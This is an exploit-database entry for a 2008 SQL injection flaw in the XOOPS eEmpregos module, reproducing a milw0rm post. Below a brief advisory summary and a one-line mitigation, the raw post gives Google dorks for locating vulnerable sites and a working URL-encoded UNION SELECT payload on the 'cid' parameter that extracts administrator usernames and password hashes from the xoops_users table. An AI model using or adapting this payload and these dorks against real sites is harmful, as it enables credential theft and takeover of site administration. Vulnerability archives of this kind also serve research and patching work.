XOOPS Module eEmpregos SQL Injection(cid)

vendor:

eEmpregos Module

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: eEmpregos Module

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

XOOPS Module eEmpregos SQL Injection(cid)

A SQL injection vulnerability exists in XOOPS Module eEmpregos. An attacker can exploit this vulnerability to inject malicious SQL commands via the 'cid' parameter in the 'index.php' script. This can be exploited to disclose the username and password of the administrator.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

##############################################################
#
# XOOPS Module eEmpregos SQL Injection(cid)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "modules/eEmpregos/index.php"
#
# DORK 2 : allinurl: cid "modules/eEmpregos"
#
################################################################
example

http://xxxx/modules/eEmpregos/index.php?pa=view&cid=[exploit]


EXPLOIT :

-00000000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202

################################################################
# S@BUN           i AM NOT HACKER               S@BUN
################################################################

# milw0rm.com [2008-02-19]